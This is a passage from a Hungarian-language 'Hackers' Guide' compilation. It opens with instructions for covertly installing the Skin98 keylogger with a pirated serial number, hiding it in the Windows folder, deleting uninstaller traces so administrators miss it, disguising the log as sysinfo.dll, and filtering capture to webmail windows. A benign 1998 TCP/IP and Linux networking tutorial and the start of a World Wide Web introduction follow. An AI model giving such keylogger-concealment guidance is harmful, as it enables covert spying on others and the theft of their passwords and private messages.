Szóval töltsük le valamelyik underground oldalról (www.keyloggers.com) a progit és<br />

a SerialZ 2000-ben pedig nézzük meg a regisztrációs információkat (akinek nem<br />

lenne: Phrozen Crew 98 s/n: D6E9CC1D). Ha ez sikerült akkor installáljuk a<br />

programot. Az installálásnál ügyeljünk arra, hogy ne külön könyvtárba kerüljön,<br />

hanem direkt a Windows könyvtárba. Hogy miért? Mert ugye nem akarjuk a<br />

rendszergazda munkáját megkönyebbíteni :-). Sajnos a program a<br />

107


Hackers’ Guide<br />

Vezérlőpult/Programok hozzáadása menüben a Programok eltávolításához felrakta<br />

magát, tehát ha valaki mondjuk a dugig lévő gépről akar törölgetni, akkor száz, hogy<br />

evvel kezdi... A profibbak kiszedhetik a regisztrációs adatbázisból a lamerek inkább<br />

egyszerűen csak töröljék az UNINST.EXE-t meg az UNINST.LOG-ot...<br />

3. Az első lépésektől a totális hatalomig...<br />

Tehát sikerült az árulkodó jeleket eltakarítanunk. Két fontos fájlra hívnám fel a<br />

figyelmet. Az első az enlog.exe... Ennek segítségével fejthetjük vissza a log fájlt. A<br />

másik a skin98.exe, ez a keylogger. Indítsuk be a programot. Ekkor megjelenik egy<br />

ablak amiben hat kis fülecskét találunk.<br />

- Intercepts<br />

Intercept key pushes - Minden leütés mentése<br />

Intercept key pops - Kis és nagybetük mentése megkülönböztetve<br />

Intercept all printed symbols (a-z, 0-9,etc.) - Minden nyomtatott karakter mentése<br />

Intercept all system keys (Alt, etc.) - Minden rendszerbillentyű mentése (Alt, Tab stb.)<br />

Intercept all mouse clicks - Minden egérkattintás mentése<br />

Log file name - Itt a logfájlnév nevét kell megadnunk, mondjuk a Win könyvtárban<br />

egy sysinfo.dll-t :-) értelemszerűen<br />

- Logs<br />

Add Begin/END marks - A számítógép indítása/Kikapcsolása(vagy újraindítása) -nak<br />

rögzítése<br />

Add date to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy<br />

újraindítása) dátumának rögzítése<br />

Add time to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy<br />

újraindítása) idejének rögzítése<br />

Save window caption - Az ablak nevének elmentése<br />

Add task name to window caption - Az alkalmazás nevének elmentése<br />

Save text from window - Szöveg mentése az ablakban<br />

Save edit lines from window - Elmenti az "edit line"-ban (nem tudok most rá magyar<br />

megfelelőt) lévő szöveget<br />

Encrypt LOG file - Ennek segítségével felismerhetetlenné válik a log fájl egyszerű<br />

F3-ra<br />

Save Pastes from clipboard - A vágópadra másolt dolgokat elmenti<br />

Password for encrypting - A szükséges kód ahhoz, hogy újra felismerhető legyen a<br />

log...<br />

Edit lines to save - Hány sor után mentse a keylogger a dolgokat...<br />

- Change password<br />

Ezt gondolom nemkell bővebben elmagyaráznom... Kód beállítása azért, hogy ne<br />

nagyon tudja más elindítani a Skin'98 configuráló részét...<br />

- Scheduling<br />

Itt beállíthatjuk, hogy melyik nap hány órától hány óráig figyelje a gépet...<br />

- Filters<br />

Szürök... Megszűrhetjük, hogy mit logoljon a progi. Ha az Enable filters kivan pipálva<br />

akkor működik a szűrés... Program neve szerint (Task fiter mask) és az ablakok<br />

neve szerint(Window capture filter mask) szűrhetünk értelemszerűen. Mondjuk ha<br />

csak Freemail-re specializálódunk akkor *freemail* a Window capture filter maskban!<br />

108


Hackers’ Guide<br />

Ennyi lenne, ami most hirtelen vasárnap a kollégiumba való visszaindulás előtt egy<br />

órával megtudtam fogalmazni ezekről a hasznos programokról. Ha bármi kérdés<br />

felmerülne, akkor ne kiméljél a leveleiddel!<br />

************************************************************************************************<br />

Mi az IP, TCP/IP<br />

Néhány év(tized)-del ezelőtt az USA-ban megkezdődött a kutatói/katonai hálózat<br />

kialakulása az ún. ARPANET. Ez kezdetben néhány egyetemből és katonai<br />

intézményből épült fel és elsősorban kutatási célokat szolgált. A hálózathoz egyre<br />

több egyetem kapcsolódott, folyamatosan gyarapodott, és így alakult ki a ma már<br />

egyre jobban ismert Internet. Mivel az internet az ARPANET-ben gyökerezik, ezért<br />

logikus, hogy sokmindent át is vett onnan, például a az alapprotokollját a TCP/IP-t.<br />

Kezdjük először is a név magyarázatával. A TCP/IP, helyesebben írva IP/TCP,<br />

általában egy teljes protokollcsaládot jelent, ami magában foglalja az összes IP-re<br />

(Internet Protocol) épülő protokollt. A TCP (Transmission Control Protocol) ennek a<br />

családnak egy tagja (tegyük hozzá, hogy ezt használjuk leggyakrabban), de emelett<br />

rengeteg "testvére" van, mint például az UDP (User Datagram Protocol) vagy az<br />

ICMP (Internet Control Message Protocol).<br />

Az internet rendkívül heterogén hálózatokat fogott össze, ezért elsődleges cél volt az<br />

IP számára, hogy a fizikai médiumtól függetlenül, bárhol képes legyen működni.<br />

Ehhez egy olyan absztrakciós rétegre van szükseg, ami minden eszközön<br />

megvalósítható, és semmilyen eszközhöz nem köthető. Az IP-ben használható<br />

eszközöknek a következő követelményeknek kell megfelelniük:<br />

• képes legyen egy meghatározott mennyiségű byte-ot egyszerre átvinni (ezt<br />

hívjuk datagrammoknak, vagy csomagoknak)<br />

• képes legyen az eszköz alacsonyszintű (fizikai címét) leképezni egy logikai -<br />

IP - címre<br />

Mint láthatjuk a fenti két megkötést szinte minden lehetséges fizikai eszközön meg<br />

lehet valósítani, kezdve az ARCNet, Ethernet hálózatoktól az egyszerű nullmodemig.<br />

Az IP (=internet protokoll) állapotmentes protokoll, nem garantálja a packetek<br />

megérkezését a célhoz, sőt azt sem, hogy a packetek ugyanolyan sorrendben<br />

érkeznek meg, mint ahogyan elküldték őket. Ez tulajdonképpen annyit jelent, hogy a<br />

fizikai médium megpróbál megtenni a csomag célbajuttatása érdekében, de nem<br />

garantál semmit.<br />

109


Hackers’ Guide<br />

Egy IP csomag két részből áll: 1) fejléc információk, amelyek tartalmazzák a forrás<br />

és célcímet, valamint 2) adatrész, ami alkalmazás-specifikus. Az IP-re épülő protokoll<br />

az IP adatrészét használhatja felsőbb szintű fejléc, valamint adat számára. Így<br />

egymásba skatulyázhatók a csomagok, a felsőbb szintű protokollok használhatják<br />

azt, amit az alsó szintű add, de kiegészíthetik további tulajdonságokkal. Így jön a<br />

képbe a TCP.<br />

Mint láthatjuk az IP használata elég nehézkes az alkalmazások szempontjából,<br />

hiszen gondoskodniuk kell a csomagok sorbaállításáról, és az elvesző packetek<br />

újraküldéséről. Hogy ne kelljen minden alkalmazásban ezeket a funkciókat<br />

implementálni, ezért létrehozták a TCP protokollt, ami gondoskodik a csomagok<br />

sorrendbe allításáról, valamint az esetlegesen elvesző packetek ujraküldéséről. A<br />

TCP így már egy garantált csatornát biztosít a programunknak, hiszen gondoskodik<br />

arról, hogy ami a kapcsolat egyik végén "bement", az a másik végén ki is jön.<br />

Láthatjuk, hogy a TCP protokoll sokkal kényelmesebb az alkalmazások<br />

szempontjából, ezért majdnem minden magas szintű protokoll ezt használja (telnet,<br />

ftp stb). Ugyanakkor nem mindig van szükség a TCP-vel járó szolgáltatásokra, ezért<br />

kialakult más IP-re épült, de úgyanúgy nem kapcsolatjellegű protokoll. Erre<br />

jellemzően a kérdés-válasz jellegű kommunikációnál lehet szükség, amikor a<br />

visszaigazolást tulajdonképpen a válasz maga jelenti. Ilyen protokoll az UDP. Ezt a<br />

protokollt használja például a DNS (domain name service), vagy az NFS (network file<br />

system).<br />

Ezen kívül még léteznek más, IP-re épülő protokollok, ilyen az ICMP (=internet<br />

control message protocol), vagy az IGMP (=internet group multicast protocol).<br />

2. Címzés<br />

2.1. Host címek<br />

Mint korábban írtam az IP azonos felületet igyekszik adni minden hálózati eszköz<br />

felé. Ebben nagy szerepet játszik a címzés felépítése, ami minden fizikai médián<br />

logikai cím, és a logikai-fizikai cím közti összerendelést a protokoll végzi el.<br />

Megjegyzendő, hogy az IP cím és a hálózati eszköz fizikai címe között nincs<br />

összefüggés.<br />

Az IP cím egy 32 bites szám, ami 4 byte-nak felel meg. Írási formája a következő:<br />

192.168.2.1<br />

Ahol két pont között egy byte-nak megfelelő tízes számrendszerbeli szám van. Ez a<br />

cím az egész interneten (ill. az intraneten, hogy ha a nagy háló nem elérhető) egyedi.<br />

Minden hálózati eszköznek saját címe van, tehát ha egy számítógépben több<br />

hálózati eszköz van (több ethernet kártya pl) , akkor az a gép több címen is elérhető.<br />

A címen kívül a célgépen meg kell neveznünk egy szolgáltatást amit el kívánunk érni.<br />

Erre az ún. portcím szolgál, ami egy 16 bites szám. A portcímek egy része előre<br />

meghatározott szolgáltatásoknak van lefoglalva, például a 23-as port a telnet, 21-es<br />

az ftp, 25-ös pedig a levelezés számára foglalt.<br />

2.2. Network címek és a netmask<br />

A hálózaton nem csak a host-okat (számítógépeket, munkaállomásokat) azonosítják<br />

IP címmel, hanem a hálózatokat is. Egy IP szegmenst a network címe azonosít. Egy<br />

host neve úgy áll össze, hogy a cím elején levő bitek határozzák meg a hálózat<br />

110


Hackers’ Guide<br />

címét, a fennmaradó bitek pedig a host-ot azonosítják a hálózaton belül. Az, hogy<br />

melyik rész a network cím, és melyik azonosítja a host-ot a netmask határozza meg.<br />

A címnek azon bitjei, amiken a netmask bitjei 1-et tartalmaznak, a network címet<br />

határozzák meg, a fennmaradó bitek pedig a network-ön belüli hostcímet adják meg.<br />

Legyen a cím:<br />

|1. byte |2. byte |3. byte |4. byte |<br />

+---------------------------------------------------------------+<br />

|1|1|0|0|0|0|0|0|1|0|1|0|1|0|0|0|0|0|0|0|0|0|1|0|0|0|0|0|0|0|0|1| = 192.168.2.1<br />

+---------------------------------------------------------------+<br />

És a netmask:<br />

+---------------------------------------------------------------+<br />

|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0| = 255.255.255.0<br />

+---------------------------------------------------------------+<br />

Tehát, ha a címünk 192.168.2.1, és a netmask 255.255.255.0, akkor a 192.168.2.0 a<br />

hálózati cím, a 192.168.2.1-nek az utolsó byteja (tehát az 1) pedig a host cím. Ebben<br />

az IP szegmensben 256 különböző cím szerepelhet, mégpedig 192.168.2.0 -<br />

192.168.2.255-ig. Ebből két címet fenntart magának a protokoll, mégpedig a<br />

192.168.2.0, ez a network cím, és a 192.168.2.255 ez pedig a broadcast cím, erről<br />

bővebben egy picit később.<br />

Ha tehát a 192.168.2.3-as címet akarjuk megcímezni, akkor a netmaskunkból látszik,<br />

hogy ez egy lokális cím, tehát közvetlenül címezhető.<br />

Ha viszont a 192.168.1.1-es címet szeretnénk elérni, a netmaskból látszik, hogy ez<br />

nem helyi cím, lokálisan nem kézbesíthető, ehhez a gateway-t (útválasztó)<br />

használjuk fel. Mi neki adjuk át a datagrammokat, a többiről pedig ő saját belső<br />

táblázataira támaszkodva gondoskodik.<br />

A netmask egy elég jó eszköz hálózatok feldarabolására, hiszen a használatával egy<br />

eredetileg 256 IP címes hálózatot fel lehet darabolni 16 db. 16 címesre, vagy 4 db.<br />

64 címesre, de akár 1 128 címesre + 2 db. 64 címesre. Ezt a technikát hívják<br />

subnetelésnek.<br />

2.3. Címosztályok<br />

Most, hogy már ismerjük a netmask fogalmát, könnyű lesz megértenünk az A, B és C<br />

címosztályokat. Az A osztályú cím az 1.0.0.0 - 126.255.255.255 címeket foglalja<br />

magába és netmaszkja 255.0.0.0 tehát egy IP szegmensben 2^24 (=16 millió) hostot<br />

képes megcímezni. A B osztályú címek 128.0.0.0 - 191.255.255.255 terjednek, és<br />

netmaskjuk 255.255.0.0 (2^16 = 65536 host). A C osztályú címek a 192.0.0.0 -<br />

223.255.255.255 címtartományban vannak, és netmaskjuk 255.255.255.0. A<br />

fennmaradó címtartomány foglalt későbbi fejlesztésekre. Ezeket a címtartományokat<br />

nem kell feltétlenül így használnunk, hiszen egy 15.1.2.3 címet is használhatunk<br />

255.255.255.0 netmaskal, és olyankor csak 256 helyi host létezik. Régen az<br />

útválasztók nem ismerték a netmask fogalmát, és csak címosztályok alapján tudtak<br />

routeolni. Ma a címosztály nem több adminisztrációs fogalomnál, illetve az egyes<br />

segédprogramok a címosztály alapján választanak alapértelmezést, de ezt bármikor<br />

átállíthatjuk.<br />

2.4. Localnet<br />

111


Hackers’ Guide<br />

Mint láthatjuk a fenti címfelosztásból kimaradt a 127.0.0.0/255.0.0.0 címtartomány.<br />

Ez az ún loopback-nek fenntartott rész. A loopback egy olyan áleszköz, ami a saját<br />

számítógépünket jelenti. Bármelyik cím a 127.0.0.0 tartományon belül a saját<br />

számítógépünkkel kommunikál.<br />

2.5. Broadcast cím<br />

Ezzel nem kell nagyon foglalkoznunk, a lényege az, hogy ezzel a címmel az összes<br />

helyi gépet megcímezhetjük, ún. körüzenetet küldhetünk ide, és azt az összes<br />

állomás venni fogja. A broadcast címnek foglalt az adott networkon megcímezhető<br />

legnagyobb hostcím. Tehát a címben a host részen csupa 1-es szerepel. Így a fenti<br />

192.168.2.0/255.255.255.0 tartományban a broadcast számára a foglalt a<br />

192.168.2.255 cím.<br />

2.6. Routolás<br />

Most már ismerünk IP címeket, netmaskokat, dehát hogyan is áll össze az egész<br />

hálózat? Erre próbálok rávilágítani ebben a fejezetben:<br />

Mint már mondtam, ha egy datagramm lokálisan nem kézbesíthető (tehát logikailag<br />

vagy fizikailag más közegben helyezkedik el), akkor az útválasztónak (gateway-nek)<br />

továbbítjuk ezt a packetet. Az útválasztónak kell eldöntenie, hogy egy adott<br />

packetnek merre kell tovább mennie. Ebben a feladatban rendelkezésre áll a cél IP<br />

cím, ill. egy belső táblázat az ún. routing tábla. (mint később láthatjuk sajat gépünkön<br />

is van ilyen tábla, de legtöbbször nem használjuk, csak a lokális háló számára van<br />

bejegyzés)<br />

Szóval a címek leírásánál már mondtam, hogy minden egyes hálózati eszköz kap<br />

egy IP címet, tehát ha a routerünknek két interface-e van, akkor neki két IP hálózatra<br />

van kijárása, számára két szegmensen is vannak közvetlenül elérhető hostok.<br />

Legyen most két IP szegmensünk, az egyik 192.168.1.xxx/255.255.255.0 (eth0<br />

eszközön keresztül), a másik pedig a 192.168.2.xxx/255.255.255.0 (az eth1<br />

eszközön keresztül). Így a routing tábla valahogy így nezne ki:<br />

Célcím Netmask Gateway Eszköz<br />

192.168.1.0 255.255.255.0 - eth0<br />

192.168.2.0 255.255.255.0 - eth1<br />

Így a routerünk meg tudja címezni mindkét IP szegmenst valamelyik eszközén<br />

keresztül. A megfelelő eszköz keresése valahogy úgy zajlik, hogy az első olyan<br />

routing bejegyzés eszköz mezője hivatkozik a keresett eszközre, aminek a<br />

tartományába a célcím beleesik.<br />

Van egy harmadik oszlop, ami a fenti két bejegyzésnél üres. Ezt az oszlopot<br />

használhatjuk fel annak megjelölésére, hogy a célcím nem lokálisan elérhető, de az<br />

adott szegmensen található gateway már tudja az utat a cél felé. Ilyen módon a<br />

gateway-ek összeláncolhatók.<br />

Vegyünk tehát fel egy olyan routing bejegyzést, amin keresztül az egesz internetet<br />

láthatjuk. Legyen ez mondjuk egy soros vonal (ppp0), a soros vonalon keresztül<br />

látunk egy gateway-t, ami az internet felé továbbítja a packeteket.<br />

Célcím Netmask Gateway Eszköz<br />

0.0.0.0 0.0.0.0 195.184.3.2 ppp0<br />

112


Hackers’ Guide<br />

Láthatjuk, hogy a netmask 0.0.0.0 tehát a teljes címtartományt lefedjük, azt is<br />

láthatjuk, hogy ezeket a kéréseket a ppp0-s eszközön kell továbbitani, ott pedig egy<br />

gateway-nek kell adnunk, akinek a címe 195.184.3.2.<br />

Ilyen módon épül fel az egész internet, minden kis helyi hálózat továbbitja a nem<br />

helyi packeteit egy olyannak, aki már tudja merre kell azt továbbítani.<br />

3. Linux<br />

Eddig általánosságban beszéltem a TCP/IP felépítéséről most szeretnék egy kicsit a<br />

Linux oldaláról közelíteni a témához.<br />

3.1. Interface-k<br />

Az interface-k tulajdonképpen a hálózati eszközöknek felelnek meg. Minden hálózati<br />

eszközt az ifconfig nevű programmal tudunk beállitani. Az általános szintaxis a<br />

következő:<br />

ifconfig netmask broadcast<br />

<br />

Ezek a legfontosabb paraméterek, bővebben lásd: man ifconfig. Az eszközök neve<br />

változó, főleg a típustól függ, általában:<br />

eth[0123456789] ethernet kártyák<br />

ppp[0123456789] ppp eszközök (soros vonali, pointopoint)<br />

sl[0123456789] slip eszközök (soros vonal)<br />

lo loopback eszköz<br />

Mielőtt ezeket az eszközöket használni tudnánk, a kernelbe be kell forditani a<br />

megfelelő drivereket.<br />

Ha az ifconfig-ot paraméterek nélkül hívjuk meg, akkor kiírja az aktuálisan<br />

felkonfigurált eszközök listáját:<br />

balabit:~$ ifconfig<br />

lo Link encap:Local Loopback<br />

inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0<br />

UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1<br />

RX packets:97 errors:0 dropped:0 overruns:0 frame:0<br />

TX packets:97 errors:0 dropped:0 overruns:0 carrier:0 coll:0<br />

eth0 Link encap:Ethernet HWaddr 00:40:F6:58:A0:B3<br />

inet addr:193.6.40.37 Bcast:193.6.40.255 Mask:255.255.255.0<br />

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />

RX packets:10936 errors:0 dropped:0 overruns:0 frame:974<br />

TX packets:3449 errors:0 dropped:0 overruns:0 carrier:0 coll:574<br />

Interrupt:10 Base address:0x300<br />

Ez megadja a beállítható paraméterek aktuális értékét, valamint néminemű<br />

statisztikai adatokkal szolgál.<br />

3.2. Routing tábla<br />

113


Hackers’ Guide<br />

A 2.5. fejezetben leírtak mint mondtam nem csak a gateway-ekre igaz, hiszen Linux<br />

alatt is kreálhatunk magunknak ilyen routing táblát, sőt egy Linux képes tökéletesen<br />

ellátni a router feladatait. A route tábla beállítását és lekérdezését a route parancs<br />

segítségével tudjuk megejteni.<br />

Indítsuk el paraméterek nélkül a route parancsot:<br />

balabit:~$ route<br />

Kernel IP routing table<br />

Destination Gateway Genmask Flags Metric Ref Use Iface<br />

193.6.40.0 * 255.255.255.0 U 0 0 6 eth0<br />

127.0.0.0 * 255.0.0.0 U 0 0 2 lo<br />

default rxkk.saturnus.v 0.0.0.0 UG 0 0 88 eth0<br />

Mit is jelent, amit látunk:<br />

Az eth0 eszközön keresztül látjuk a lokális hálózatot, ami a 193.6.40.0/255.255.255.0<br />

tartománynak felel meg. (ez az első sor)<br />

A 127.0.0.0/255.0.0.0 -n saját magunkat látjuk, ez a loopback.<br />

Az összes többi packet pedig, ami nem fér be a fenti két kategóriába a default-on<br />

megy keresztül, ami egy gateway-nek továbbít minden packetet.<br />

Új bejegyzéseket is vehetünk fel a route paranccsal. A szintaxis körülbelül a<br />

következő:<br />

route netmask dev <br />

3.3. Hálózati mintabeállítások<br />

Ebben a fejezetben konkrét példákat nézünk át, hogy adott konfigurációban hogyan<br />

kell beállítanunk a hálózatot a fenti ifconfig és route parancsok segítségével. Később<br />

a disztribúció specifikus beállításokat nézzük át, az újabb disztribúciók ugyanis<br />

sokkal egyszerűbbé teszik ezeket a beállításokat, és már kész scripteket adnak,<br />

amiket megfelelően felparaméterezve ugyanoda juthatunk, mint ha külön-külön<br />

kiadnánk a lenti parancsokat.<br />

3.3.1. Linux ethernet hálózaton<br />

Példa: A számítógépben egyetlen ethernet kártya van, és ezen keresztül éri el az<br />

internetet, és a lokális gépeket egyaránt. A helyi hálózat egy C osztályú IP<br />

szegmensen van.<br />

Megoldás: A gép IP címe a példa kedvéért legyen 192.168.2.1, a gateway legyen<br />

192.168.2.254. Ekkor a következő parancsokkal lehet beállítani a hálózatot:<br />

$ ifconfig eth0 192.168.2.1 netmask 255.255.255.0 broadcast 192.168.2.255<br />

network 192.168.2.0<br />

Ez beállítja az eth0 eszköz IP címét, a rajta keresztül elérhető hálózat maszkját, a<br />

körüzenet címét, és a hálózati címet.<br />

$ route add -net 192.168.2.0<br />

Ez beállítja a helyi hálózat route bejegyzését, így ezentúl a 192.168.2.xxx című<br />

hostokat el tudjuk érni.<br />

114


$ route add default gw 192.168.2.254<br />

Hackers’ Guide<br />

Ez pedig a lényeg: minden olyan csomag, amiről eddig nem rendelkeztünk, menjen a<br />

192.168.2.254-en levő útválasztóra.<br />

3.3.2. Linux modemes dialup-al<br />

Ma még - sajnos - nem jellemző az, hogy egy számítógép folyamatos kapcsolattal<br />

rendelkezzen a külvilág felé. Általános kapcsolódási módszer a telefonos hálózaton<br />

történő kapcsolódás. Ehhez legalább kétféle protokoll áll rendelkezésünkre:<br />

• SLIP (= Serial Line Internet Protocol)<br />

• PPP (= Point to Point Protocol)<br />

Az első egy egyszerű, de meglehetősen elavult protokoll, ma már egyre kevésbé<br />

használják, és sokkal inkább a második hódit tért. A PPP nem csak IP-t tud átvinni,<br />

hanem például IPX-et is, támogatja az azonosítást, és sokkal jobban definiált. A<br />

kapcsolat felvétel két fő lépésből áll:<br />

1. A modem-számítógép kommunikációja, tárcsázás, kapcsolatfelvétel<br />

2. Amennyiben a kapcsolat létrejött, az adatcsatorna átalakítása bináris<br />

kommunikációra, csomagok forgalmazása<br />

A számítógép a modemeket szöveges parancsokkal vezérli (ezek a Hayes féle<br />

modemvezérlő parancsok). Ha az adatkapcsolat létrejött, akkor kapunk egy terminált,<br />

amin egy login prompt utan az azonosítónkat, és a jelszavunkat begépelve shell-hez<br />

juthatunk a távoli gépen. Amennyiben azonban adatot szeretnénk forgalmazni, ahhoz<br />

a távoli kiszolgálógépen és a saját számítógépünkön is el kell indítanunk az<br />

adatkapcsolatot levezénylő programot. (ez PPP esetében a pppd). Például itt egy<br />

bejelentkezés modemen keresztül:<br />

ATZ


Hackers’ Guide<br />

Vár Válasz<br />

- ATZ<br />

OK ATDT501060<br />

login: bazsi<br />

password: xxxxx<br />

altair:~$ pppd<br />

Ezt a kérdés-válasz kommunikációt hívják chat-nek, és a leírását pedig chatscriptnek.<br />

A chat-script segítségével a teljes belépési folyamat automatizálható. A<br />

modemes dialup beállításához tehát létre kell hoznunk egy chat scriptet, amit<br />

megadva a pppd-nek felépíthető a kapcsolat. Ehhez a következő paraméterekkel kell<br />

indítanunk a pppd-t:<br />

balabit:~$ pppd /dev/modem modem lock connect /etc/ppp/chatscript defaultroute<br />

Nézzük a paraméterek jelentését:<br />

• /dev/modem: a modemünket jelképező eszköz. Ez általában egy symlink<br />

valamelyik soros portra (/dev/ttySxx)<br />

• modem: azt mondja meg a pppd-nek, hogy a modem vezérlő vonalakat be kell<br />

állítani (DTR, stb)<br />

• lock: azt jelenti, hogy a modemet lockolni kell (UUCP stílusú lock)<br />

• connect /etc/ppp/chatscript: ezzel adjuk meg a chat script nevét. Erről a<br />

scriptről bővebben később.<br />

• defaultroute: azt jelenti, hogy a pppd által felállított adatcsatorna legyen a<br />

default route bejegyzés, azaz minden csomag erre menjen kifelé.<br />

A fennt megadandó chat script standard inputjára és outputjára a modem kerül, tehát<br />

minden amit kiírunk azt megkapja a modem, és a modem által küldött adatokat<br />

olvashatjuk be. A chat scriptet a chat nevű programmal tudjuk "lejátszani". Tehát az<br />

"/etc/ppp/chatscript" nevű állományba a következőket kell írnunk:<br />

#!/bin/sh<br />

chat `` `ATZ` `OK` `ATDT501060` `login:` `bazsi` `password:` `xxxx` `altair:~$` `pppd`<br />

Így elértük célunkat, a kapcsolatfelvételt automatizáltuk.<br />

3.3.3. Hálózati eszközök beállítása RedHat alatt<br />

Redhat alatt nagyon jól megoldották az interface-k beállításást. Egyrészt mindent<br />

megtehetünk X-Window alól, a control-panel segítségével, másrészt a control-panel<br />

által generált állományokat is kitölthetjük az /etc/sysconfig/network-scripts alatt<br />

könyvtárban.<br />

Egy hálózati eszközhöz tartozó beállítások az ifcfg-eszknév nevű állományokban<br />

találhatók a fent megnevezett könyvtárban, tehát az eth0 eszköz adatai az<br />

/etc/sysconfig/network-scripts/ifcfg-eth0 állományban található. Minden ilyen<br />

állomány egy shell script, aminek a feladata néhány változónak a beállítása, ezért<br />

általában így néz ki:<br />

DEVICE=eth0<br />

IPADDR=195.184.3.121<br />

116


NETMASK=255.255.255.0<br />

NETWORK=195.184.3.0<br />

BROADCAST=195.184.3.255<br />

ONBOOT=yes<br />

BOOTPROTO=none<br />

Hackers’ Guide<br />

Általában a konkrét eszköz típusától függően további paramétereket is beállíthatunk,<br />

de a fentieket mindenhol értelmezik. Egy soros porthoz két állomány is tartozik az<br />

egyik az ifcfg-ppp0, a másik pedig az ehhez tartozó chat script (chat-ppp0). Egy<br />

soros porthoz tartozó ifcfg-ppp0 például így néz ki:<br />

PERSIST=no<br />

DEFROUTE=yes<br />

ONBOOT=no<br />

INITSTRING=ATZ<br />

MODEMPORT=/dev/modem<br />

LINESPEED=115200<br />

ESCAPECHARS=no<br />

DEFABORT=yes<br />

HARDFLOWCTL=yes<br />

DEVICE=ppp0<br />

PPPOPTIONS=<br />

DEBUG=no<br />

PAPNAME=bazsi<br />

REMIP=195.184.3.117<br />

IPADDR=195.184.3.121<br />

BOOTPROTO=none<br />

MTU=1500<br />

MRU=1500<br />

DISCONNECTTIMEOUT=<br />

RETRYTIMEOUT=<br />

USERCTL=yes<br />

Az egyes paraméterek jelentése értelemszerű, ezeknek a fileoknak a beállítását<br />

érdemesebb control-panellel végeznünk, az kitölti az összes mezőt a számunkra.<br />

3.3.4. Hálózati eszközök beállítása Debian alatt<br />

...<br />

3.3.5. Hálózati eszközök beállítása SuSe alatt<br />

...<br />

3.4. Nameserver beállítása<br />

A nevek IP címmé, valamint az IP címek nevekké fordítása az ún. DNS (domain<br />

name service) feladata. A DNS szerver-t általában a szolgáltatónk üzemelteti, és ő<br />

adja meg a szerver adatait is. (IP cím)<br />

Ezeket az adatokat az /etc/resolv.conf nevű fileban lehet megadni, ahol a következő<br />

kulcsszavak értelmezettek:<br />

117


Hackers’ Guide<br />

nameserver<br />

<br />

search<br />

domain1<br />

domain2<br />

A DNS IP címét adja meg.Többet is felsorolhatunk space-el<br />

elválasztva.<br />

Keresési zónákat adhatunk meg, amennyiben egy host a domain1 v.<br />

domain2 zónában van, akkor elég a zónán belüli nevét használnunk.<br />

(pl: proba.domain1 helyett elég proba-t írni)<br />

3.5. Nameserver nélküli beállítás<br />

Amennyiben a hálózatunkon nincsen nameserver, például nincs kapcsolatunk az<br />

internettel, akkor is szükségünk lehet név -> IP cím feloldásra. Ekkor alternatív<br />

megoldásként használhatjuk az /etc/hosts állományt. Ennek a formátuma:<br />

IP cím név/nevek<br />

127.0.0.1 localhost<br />

192.168.2.1 proba.domain.nev proba<br />

Ekkor a "proba.domain.nev" és a "proba" mindkettő a 192.168.2.1-es címhez lesz<br />

hozzárendelve.<br />

4. Szerzői jogok, és garancia<br />

Az ilyen dolgokat mindig is utáltam, de valamennyire szükség van rá. Szóval a<br />

dokumentum tartalmát illetően semmiféle garanciát nem vállalok, az itt levő<br />

bármelyik parancs begépelése földrengéseket, tűzvészeket okozhat, és akár<br />

megformázhatja a vinyódat (bár ilyen még soha nem történt), de erről én egyáltalán<br />

nem tehetek. Ha ezt nem hiszed el, akkor sajnos le kell tegyél e dokumentum<br />

bármilyen formában történő felhasználásáról.<br />

Copyright (c) 1998, Balázs Scheidler.<br />

A szerzői jogok engem, Scheidler Balázst, illetnek, és ezt az irományt 1998-ban<br />

követtem el, úgyhogy még legalább 70(*) évig az enyémek is maradnak. Minden jog<br />

engem illet, de kegyesen adok néhány jogot nektek is: tehát a dokumentumot<br />

elektronikus módon szabadon terjesztheted, amíg a fenti copyright sor a helyén<br />

marad. Egyéb terjesztésről egyénileg beszélhetünk.<br />

Amennyiben tanulsz valamit ebből a dokumentumból, és hasznodra válik, lógsz egy<br />

sörrel, amit egyszer majd BEHAJTOK. :-)<br />

Ja még annyit akartam írni, hogy megtalálsz a bazsi@balabit.hu e-mail címen,<br />

kritikát, bővítéseket, flame-t oda küldhetsz.<br />

* eredetileg itt 50 év állt, de Balogh Zsolt felvilagosított, hogy a szerzôi jogok az<br />

embert 70 évig illetik meg.<br />

************************************************************************************************<br />

118


A WORLD WIDE WEB<br />

Hackers’ Guide<br />

A World Wide Web (WWW vagy Web) a kliens/szerver modell alapján mûködik.<br />

Amikor tehát a Web-et használjuk, akkor tulajdonképpen két programot veszünk<br />

igénybe: a klienst és a szervert. A kliensprogram az, amelyik a lokális terminálunkon<br />

fut, ez a program jeleníti meg képernyõnkön az információkat, fogadja a<br />

billentyûleütéseket és az egérrel végrehajtott mûveleteket valamint visszakeresi az<br />

igényelt információt a szerveren.<br />

A szerverprogram abban a számítógépes rendszerben fut, amelyik a Web<br />

információt biztosítja. Várja a felhasználók igényeit és a kliensek számára az<br />

információkat biztosítja. A legtöbb esetben a felhasználónak csak az egyenlet<br />

második felével kell törõdnie, vagyis azzal, hogy miként mûködik a kliensprogram.<br />

Ugyanis ez az a program, amelyet használ, amellyel dolgozik és az a rész amelyet a<br />

szerver végez, láthatatlan számára. A Webbel kapcsolatos feladatok végrehajtása<br />

során a háttérben valószínûleg több különbözõ szerver fogja az igényeinket kezelni.<br />

A háttérben folyó mûveletek megemlítésének kizárólag csak az az oka, hogy ha<br />

valamelyik irat váratlanul hozzáférhetetlenné válik, akkor megértsük, hogy ennek az<br />

az oka, hogy egy olyan szerverrel próbáltuk meg fölvenni a kapcsolatot amelyik<br />

éppen nem üzemel.<br />

A Web sokféle információt kezel, amelyek általában a Hypertext Mark-up Language<br />

formátummal rendelkeznek. Ez a formátum azt jelenti, hogy a formázásra és a<br />

csatolásra vonatkozó kódok a szövegen belül helyezkednek el. A megfelelõ<br />

kliensprogram használatával az adott platform minden elõnye kihasználható. A<br />

Weben a hypertext-szolgáltatásokon kívül szinte minden Internet eszköz elérhetõ<br />

(FTP, Gopher, WAIS,Hírcsoport, Telnet).<br />

Talán a legelsõ web-lap volt a legegyszerûbb, ahol szinte csak szöveg volt, esetleg<br />

